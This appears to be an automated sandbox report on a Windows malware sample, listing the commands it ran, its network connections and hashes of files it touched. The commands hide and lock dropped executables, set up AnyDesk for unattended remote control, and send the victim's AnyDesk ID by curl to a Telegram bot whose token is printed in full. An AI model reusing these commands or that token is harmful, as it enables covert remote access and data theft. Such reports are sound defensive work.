C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/conhost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /inheritance:r /grant:r Admin:RX /deny Admin:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/Anydesk.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/anydesk.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC))
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/svchost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/svchost.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/conhost.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /setowner "SYSTEM"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/conhost.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC)
C:\Windows\system32\attrib.exe
attrib +r +s "C:\ProgramData/stn.exe"
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /setowner "SYSTEM"
C:\Windows\system32\timeout.exe
timeout /T 30 /NOBREAK
C:\Windows\system32\icacls.exe
icacls "C:\ProgramData/stn.exe" /inheritance:r /grant:r SYSTEM:RX /deny SYSTEM:(DE,WO,WDAC)
C:\ProgramData\Anydesk.exe
"C:\ProgramData\Anydesk.exe" --control
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6912 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7180 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2060,8679241964357093862,4091776313331041541,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5884 /prefetch:2
C:\ProgramData\AnyDesk.exe
"C:\ProgramData/Anydesk.exe" --remove-password
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo DinaOwnsMe "
C:\ProgramData\AnyDesk.exe
"C:\ProgramData/Anydesk.exe" --set-password
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\ProgramData\Anydesk.exe" --get-id
C:\ProgramData\AnyDesk.exe
C:\ProgramData\Anydesk.exe --get-id
C:\Windows\system32\curl.exe
curl -k -f "https://api.telegram.org/bot7196577299:AAEob7nYSq_eAD8egojP3Pct71tZ1r_lZnI/sendMessage?chat_id=-1002158648396&text=Admin-1882521612"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | cdn.jsdelivr.net | udp |
| US | 151.101.1.229:443 | cdn.jsdelivr.net | tcp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 229.1.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.20.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | counter.yadro.ru | udp |
| US | 8.8.8.8:53 | pay.google.com | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | stun.l.google.com | udp |
| US | 8.8.8.8:53 | stun.fpapi.io | udp |
| NL | 142.250.27.92:443 | pay.google.com | tcp |
| NL | 142.250.27.92:443 | pay.google.com | tcp |
| RU | 88.212.201.204:443 | counter.yadro.ru | tcp |
| US | 74.125.250.129:19302 | stun.l.google.com | udp |
| RU | 88.212.201.204:443 | counter.yadro.ru | tcp |
| NL | 142.250.27.92:443 | pay.google.com | udp |
| US | 8.8.8.8:53 | google.com | udp |
| GB | 142.250.178.14:443 | google.com | tcp |
| US | 8.8.8.8:53 | 129.250.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.27.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.178.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 204.201.212.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | pay.sandbox.google.com | udp |
| NL | 142.250.27.92:443 | pay.google.com | udp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| NL | 142.250.27.81:443 | pay.sandbox.google.com | tcp |
| GB | 142.250.200.2:443 | googleads.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | 196.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.27.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn.iplogger.org | udp |
| US | 104.21.4.208:443 | cdn.iplogger.org | tcp |
| US | 104.21.4.208:443 | cdn.iplogger.org | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| NL | 23.63.101.153:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | 208.4.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 153.101.63.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gofile.io | udp |
| FR | 151.80.29.83:443 | gofile.io | tcp |
| FR | 151.80.29.83:443 | gofile.io | tcp |
| US | 8.8.8.8:53 | api.gofile.io | udp |
| FR | 151.80.29.83:443 | api.gofile.io | tcp |
| US | 8.8.8.8:53 | 83.29.80.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | s.gofile.io | udp |
| FR | 51.75.242.210:443 | s.gofile.io | tcp |
| US | 8.8.8.8:53 | ad.a-ads.com | udp |
| FR | 51.75.242.210:443 | s.gofile.io | tcp |
| DE | 148.251.1.246:443 | ad.a-ads.com | tcp |
| US | 8.8.8.8:53 | static.a-ads.com | udp |
| US | 8.8.8.8:53 | 210.242.75.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 246.1.251.148.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.215.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | store10.gofile.io | udp |
| FR | 31.14.70.252:443 | store10.gofile.io | tcp |
| FR | 31.14.70.252:443 | store10.gofile.io | tcp |
| US | 8.8.8.8:53 | 252.70.14.31.in-addr.arpa | udp |
| US | 8.8.8.8:53 | boot.net.anydesk.com | udp |
| FR | 37.59.29.33:443 | boot.net.anydesk.com | tcp |
| US | 8.8.8.8:53 | relay-ad195ac5.net.anydesk.com | udp |
| GB | 57.128.141.163:443 | relay-ad195ac5.net.anydesk.com | tcp |
| US | 8.8.8.8:53 | 33.29.59.37.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.141.128.57.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.43.201.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ctt.ac | udp |
| US | 134.209.68.5:443 | ctt.ac | tcp |
| US | 134.209.68.5:443 | ctt.ac | tcp |
| US | 8.8.8.8:53 | clicktotweet.com | udp |
| US | 134.209.68.5:443 | clicktotweet.com | tcp |
| US | 8.8.8.8:53 | 5.68.209.134.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.213.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | stats.g.doubleclick.net | udp |
| BE | 64.233.166.157:443 | stats.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | twitter.com | udp |
| US | 104.244.42.193:443 | twitter.com | tcp |
| US | 104.244.42.193:443 | twitter.com | tcp |
| US | 8.8.8.8:53 | x.com | udp |
| US | 8.8.8.8:53 | 104.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.166.233.64.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.42.244.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.twitter.com | udp |
| US | 8.8.8.8:53 | abs.twimg.com | udp |
| US | 104.244.42.130:443 | api.twitter.com | tcp |
| US | 8.8.8.8:53 | api.x.com | udp |
| US | 152.199.21.141:443 | abs.twimg.com | tcp |
| US | 8.8.8.8:53 | pbs.twimg.com | udp |
| US | 8.8.8.8:53 | t.co | udp |
| PL | 93.184.221.165:443 | t.co | tcp |
| US | 104.244.42.130:443 | api.x.com | tcp |
| US | 151.101.188.159:443 | pbs.twimg.com | tcp |
| US | 152.199.21.141:443 | abs.twimg.com | tcp |
| US | 8.8.8.8:53 | 130.42.244.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.21.199.152.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 165.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 159.188.101.151.in-addr.arpa | udp |
| FR | 37.59.29.33:443 | boot.net.anydesk.com | tcp |
| US | 8.8.8.8:53 | video.twimg.com | udp |
| GB | 199.232.56.158:443 | video.twimg.com | tcp |
| US | 8.8.8.8:53 | abs-0.twimg.com | udp |
| US | 8.8.8.8:53 | relay-0135ac48.net.anydesk.com | udp |
| US | 104.244.43.131:443 | abs-0.twimg.com | tcp |
| GB | 57.128.141.165:443 | relay-0135ac48.net.anydesk.com | tcp |
| US | 8.8.8.8:53 | spankbang.com | udp |
| US | 104.19.131.98:443 | spankbang.com | tcp |
| US | 104.19.131.98:443 | spankbang.com | tcp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 8.8.8.8:53 | 158.56.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.43.244.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 165.141.128.57.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.131.19.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.102.255.239.in-addr.arpa | udp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 104.244.42.130:443 | api.x.com | tcp |
| US | 104.244.42.130:443 | api.x.com | tcp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 8.8.8.8:53 | accounts.google.com | udp |
| NL | 142.250.102.84:443 | accounts.google.com | tcp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| NL | 142.250.102.84:443 | accounts.google.com | udp |
| US | 8.8.8.8:53 | 84.102.250.142.in-addr.arpa | udp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 8.8.8.8:53 | tb.sb-cd.com | udp |
| US | 8.8.8.8:53 | hls-uranus.sb-cd.com | udp |
| US | 104.16.4.5:443 | hls-uranus.sb-cd.com | tcp |
| US | 104.16.4.5:443 | hls-uranus.sb-cd.com | tcp |
| US | 104.16.5.5:443 | hls-uranus.sb-cd.com | tcp |
| US | 8.8.8.8:53 | deliver.ptgncdn.com | udp |
| US | 8.8.8.8:53 | c.ptgncdn.com | udp |
| US | 104.18.33.166:443 | deliver.ptgncdn.com | tcp |
| GB | 195.181.164.14:443 | c.ptgncdn.com | tcp |
| GB | 195.181.164.14:443 | c.ptgncdn.com | tcp |
| US | 104.18.33.166:443 | deliver.ptgncdn.com | tcp |
| US | 104.16.5.5:443 | hls-uranus.sb-cd.com | tcp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 8.8.8.8:53 | assets.sb-cd.com | udp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | tcp |
| US | 8.8.8.8:53 | 5.4.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.5.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 166.33.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.164.181.195.in-addr.arpa | udp |
| US | 104.16.4.5:443 | assets.sb-cd.com | tcp |
| US | 104.16.4.5:443 | assets.sb-cd.com | tcp |
| US | 104.16.4.5:443 | assets.sb-cd.com | tcp |
| US | 8.8.8.8:53 | static.cloudflareinsights.com | udp |
| US | 8.8.8.8:53 | flagb99273.spankbang.com | udp |
| US | 104.16.80.73:443 | static.cloudflareinsights.com | tcp |
| US | 104.19.130.98:443 | flagb99273.spankbang.com | tcp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 8.8.8.8:53 | 14.25.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.80.16.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.130.19.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | creative.xlviirdr.com | udp |
| US | 104.18.40.50:443 | creative.xlviirdr.com | tcp |
| US | 8.8.8.8:53 | impactserving.com | udp |
| US | 104.18.176.151:443 | impactserving.com | tcp |
| US | 8.8.8.8:53 | a.magsrv.com | udp |
| US | 8.8.8.8:53 | stats.postgen.com | udp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 8.8.8.8:53 | static.javhd.com | udp |
| GB | 89.187.167.5:443 | a.magsrv.com | tcp |
| US | 74.117.182.34:443 | stats.postgen.com | tcp |
| US | 74.117.182.34:443 | stats.postgen.com | tcp |
| US | 8.8.8.8:53 | 50.40.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 151.176.18.104.in-addr.arpa | udp |
| GB | 195.181.164.21:443 | static.javhd.com | tcp |
| US | 74.117.182.34:443 | stats.postgen.com | tcp |
| US | 8.8.8.8:53 | s.magsrv.com | udp |
| NL | 95.211.229.246:443 | s.magsrv.com | tcp |
| US | 8.8.8.8:53 | go.mnaspm.com | udp |
| US | 104.18.40.50:443 | go.mnaspm.com | tcp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| US | 8.8.8.8:53 | s3t3d2y8.afcdn.net | udp |
| US | 8.8.8.8:53 | creative.mnaspm.com | udp |
| US | 8.8.8.8:53 | 5.167.187.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.164.181.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.182.117.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 246.229.211.95.in-addr.arpa | udp |
| GB | 195.181.164.16:443 | s3t3d2y8.afcdn.net | tcp |
| US | 8.8.8.8:53 | img.stripcdn.com | udp |
| US | 8.8.8.8:53 | st.stripcdn.com | udp |
| US | 104.18.40.50:443 | creative.mnaspm.com | tcp |
| US | 8.8.8.8:53 | video.ktkjmp.com | udp |
| US | 104.18.48.21:443 | video.ktkjmp.com | tcp |
| US | 8.8.8.8:53 | 16.164.181.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.48.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | img.strpst.com | udp |
| US | 8.8.8.8:53 | go.xhamsterlive.com | udp |
| US | 104.17.10.106:443 | img.strpst.com | tcp |
| US | 104.17.112.106:443 | go.xhamsterlive.com | tcp |
| US | 8.8.8.8:53 | 106.10.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.112.17.104.in-addr.arpa | udp |
| US | 104.18.40.50:443 | creative.mnaspm.com | tcp |
| US | 8.8.8.8:53 | go.xlviirdr.com | udp |
| US | 8.8.8.8:53 | vstream-10.sb-cd.com | udp |
| US | 8.8.8.8:53 | static.hotjar.com | udp |
| DE | 156.146.33.59:443 | vstream-10.sb-cd.com | tcp |
| FR | 18.161.111.39:443 | static.hotjar.com | tcp |
| US | 8.8.8.8:53 | vstream-26.sb-cd.com | udp |
| US | 8.8.8.8:53 | strp.chat | udp |
| US | 104.17.117.12:443 | strp.chat | tcp |
| DE | 212.102.56.185:443 | vstream-26.sb-cd.com | tcp |
| US | 8.8.8.8:53 | 59.33.146.156.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 39.111.161.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | script.hotjar.com | udp |
| FR | 216.137.52.72:443 | script.hotjar.com | tcp |
| US | 8.8.8.8:53 | 17.97.161.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.117.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 185.56.102.212.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.52.137.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | edge-hls.sacdnssedge.com | udp |
| GB | 195.181.164.12:443 | edge-hls.sacdnssedge.com | tcp |
| US | 8.8.8.8:53 | b-hls-25.sacdnssedge.com | udp |
| GB | 195.181.164.11:443 | b-hls-25.sacdnssedge.com | tcp |
| US | 8.8.8.8:53 | 12.164.181.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.164.181.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 239.255.102.18:50001 | udp | |
| N/A | 239.255.102.18:52192 | udp | |
| N/A | 239.255.102.18:867 | udp | |
| N/A | 239.255.102.18:50002 | udp | |
| N/A | 239.255.102.18:58795 | udp | |
| N/A | 239.255.102.18:60274 | udp | |
| N/A | 239.255.102.18:50003 | udp | |
| N/A | 239.255.102.18:56830 | udp | |
| N/A | 239.255.102.18:60719 | udp | |
| US | 8.8.8.8:53 | engine-cm.hqscene.com | udp |
| NL | 95.211.140.208:443 | engine-cm.hqscene.com | tcp |
| US | 8.8.8.8:53 | cdn-cm.hqscene.com | udp |
| NL | 95.211.229.246:443 | s.magsrv.com | tcp |
| US | 8.8.8.8:53 | cdn.banhq.com | udp |
| US | 8.8.8.8:53 | api.playanext.com | udp |
| FR | 52.84.45.102:443 | cdn.banhq.com | tcp |
| FR | 52.84.45.102:443 | cdn.banhq.com | tcp |
| FR | 18.161.111.67:80 | api.playanext.com | tcp |
| US | 8.8.8.8:53 | 208.140.211.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 102.45.84.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.111.161.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | vstream-38.sb-cd.com | udp |
| DE | 212.102.56.136:443 | vstream-38.sb-cd.com | tcp |
| US | 8.8.8.8:53 | 136.56.102.212.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | vstream-43.sb-cd.com | udp |
| NL | 185.76.10.18:443 | vstream-43.sb-cd.com | tcp |
| US | 8.8.8.8:53 | 18.10.76.185.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 4dc6fc5e708279a3310fe55d9c44743d |
| SHA1 | a42e8bdf9d1c25ef3e223d59f6b1d16b095f46d2 |
| SHA256 | a1c5f48659d4b3af960971b3a0f433a95fee5bfafe5680a34110c68b342377d8 |
| SHA512 | 5874b2310187f242b852fa6dcded244cc860abb2be4f6f5a6a1db8322e12e1fef8f825edc0aae75adbb7284a2cd64730650d0643b1e2bb7ead9350e50e1d8c13 |
\??\pipe\LOCAL\crashpad_4612_JGLVVWSPOGSKVTJC
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | c9c4c494f8fba32d95ba2125f00586a3 |
| SHA1 | 8a600205528aef7953144f1cf6f7a5115e3611de |
| SHA256 | a0ca609205813c307df9122c0c5b0967c5472755700f615b0033129cf7d6b35b |
| SHA512 | 9d30cea6cfc259e97b0305f8b5cd19774044fb78feedfcef2014b2947f2e6a101273bc4ad30db9cc1724e62eb441266d7df376e28ac58693f128b9cce2c7d20d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | ef598bd0ee14c2c1bad2d36e45ace7bd |
| SHA1 | 247b2c4efa6966824d158d3871ca832a27583d3f |
| SHA256 | 3239774e7a3a121f9b74074764ec5498577c2cea99df8ee68bddcc71508a9cca |
| SHA512 | e7f31d8c7bc2794509b5d675490b6701605c2c2e08fdc08144b945af816d65927994223eeb9c53cf014e07c5c105bfc83e7e45a0cc33f2c8d0525ceea2ed0cf7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 206702161f94c5cd39fadd03f4014d98 |
| SHA1 | bd8bfc144fb5326d21bd1531523d9fb50e1b600a |
| SHA256 | 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167 |
| SHA512 | 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 4a0899cfefad47cd2441e4b3d829899a |
| SHA1 | ab26377aa30b79f2102958446c1856fe9bbfd896 |
| SHA256 | 3ea498e050e4fde73e64bdcef4b62771c72e14c3a6f6407e06ad63000967a19e |
| SHA512 | f765ee2e8604b87ee455fd55be329cb5546ec9bb5066ed4080a623e942a197ae6d375cf2d4db5e7d7663375151e5b7e46d0980936076360076e01b08061a8b5c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 6b9ced08cbec67475b335b9f26466969 |
| SHA1 | 831c75d18222794b6801b883fb0da3e73cf137ee |
| SHA256 | 899c05c55fbd06dccdc6f673992eb8399bb069efa90894009b5a953ade3a78a4 |
| SHA512 | 31d8fa33de44f1af1546eb01c0c5828cf95679d0ab0789853bc51de4049433deae88953434ba8452261657cd1b92cc2f7a225320592498bb2fbcda43d674c172 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | e9b3c9253c2f07ce2010a6d30958ddf8 |
| SHA1 | 407e52a56467a765ae8e8a23db0627d179d50089 |
| SHA256 | 34e0572ceeabbc390ea84fcafc7a0298dc6bf9024107308eecc594a4485c0d38 |
| SHA512 | 1fb4ec622902428b150a6d842f8e151afcbaa808515e005fd8c0b6742f69f6f4f3d2e9bcbf8c8b8ee95eb1879f1d080495b5b23ffb3fb3059688b681f5a70005 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe57bdf1.TMP
| MD5 | c60c14f0bb2d98ff120f248d6eba788d |
| SHA1 | 34e53a1bb93f911832d3f06a6efb20329af229ea |
| SHA256 | 46185ca28082d3bcafb831304f26cec07608bfc09c1a8b6beb82b83d221a80af |
| SHA512 | 5eb1fcbdffe503e7e5abe9092a3877df02f3610213f2df60459fb06c7bb3b3e59bb26d49344a553dd86fbd1ed866248fb8a7bd8441632441244d17f134675705 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 2221490886625b6d5435864b88a0b566 |
| SHA1 | 63116be27b50b8c771ea95e5f8514ff6e43ac134 |
| SHA256 | 23ad44119fe7fd9ae64497f73c0d7ca4a6e96b73913433ae452020920ddb4fe1 |
| SHA512 | ff6206238b3248e1e2ecaeaf5b3c06a42254eb180e82e9994652057b6ecfc32da4bbff24095917a20b01f8256c7f5fed3afbb329edccdd31bfae39b91d568333 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | c6667a1474519c6d0c881190bfbb8e67 |
| SHA1 | ec34f72a37d8772b7d16bc2ab37e416fb5df98ca |
| SHA256 | 6bb64ca35ef2005b6a65ffdb222e2e570d1ef1ec97479d34cc8d36cd47c8214b |
| SHA512 | 6d438e31b9ed192a25c7bdcdac3af57c795db9636e8daf781c2fcd521a2fd271ffc7f8641aac289ad1c13072b156cfd2ea7a61ba59666c707c489e569438dec4 |
C:\Users\Admin\Downloads\Unconfirmed 493133.crdownload
| MD5 | e10b6631d11b3f4aabb1256da4296588 |
| SHA1 | 2949c1316f6036b3f13d128fb048b78229c49755 |
| SHA256 | 0a2476399914219d49f77018ccaf1412811d1b8464d1bab4057bc1c1763e1ac4 |
| SHA512 | 7ecfe5fc310ebc500a7f7f7136ef5dd886ef7de35d35648a5a0d6f0a12d95c4282ab87b358a1bf151e9f7efeaddc946f5d2b7b357eee24c150baee8761136234 |
C:\Users\Admin\AppData\Local\Temp\2C5A.tmp\2C5B.tmp\2C5C.vbs
| MD5 | d9c7f4fd88a8a0d08f8181c4bfd21b72 |
| SHA1 | 2c72ed965a31bd8b39013b12099b244df58fa8e1 |
| SHA256 | 65537c23d5789c2f574f961f5d34a04391ffffa4ba92a9b448f1946e7ede4a6f |
| SHA512 | f9c23cfb1550be89d1c47109491738e5471b1ed514fde58581f6769ebfd03b97ab32999d8cdb2977e60f1b166c47b2d41cbacbc78718312c638246b5ad04b78b |
C:\Users\Admin\AppData\Roaming\doorbell-upd.exe
| MD5 | af75667a7f08a01ae6d7e174922690db |
| SHA1 | bcacd4fc04d1c794dc6ad5b10fc08c4036de8680 |
| SHA256 | 35b7037d72cb861847025ffe8bb5d70eff3e88f544e8c203da2e61c0f5b9ca4d |
| SHA512 | d99b222040fb74650faceaa48543e956ccb48a3483c977b966a2807cf017e4d74f53d8c90ea6139fb3e490949a62a055827a00f3c110d2629cfe34020c9d3d10 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 3172b5168f1132b07e11e924e44db0a5 |
| SHA1 | d759d53001b18f12233b8c1c008811d327605888 |
| SHA256 | 118d9b39bababd5d92271e63f810ca7a465d311ba40148a17a46c3124b20af13 |
| SHA512 | 5efa3806353bf0c04e72191c5cb7e8735696a053358cba682f22665a3e35ed918c1b9855b41413e00bbf95108adadc24a2d9ccb8547cb06ba385ebb932b52351 |
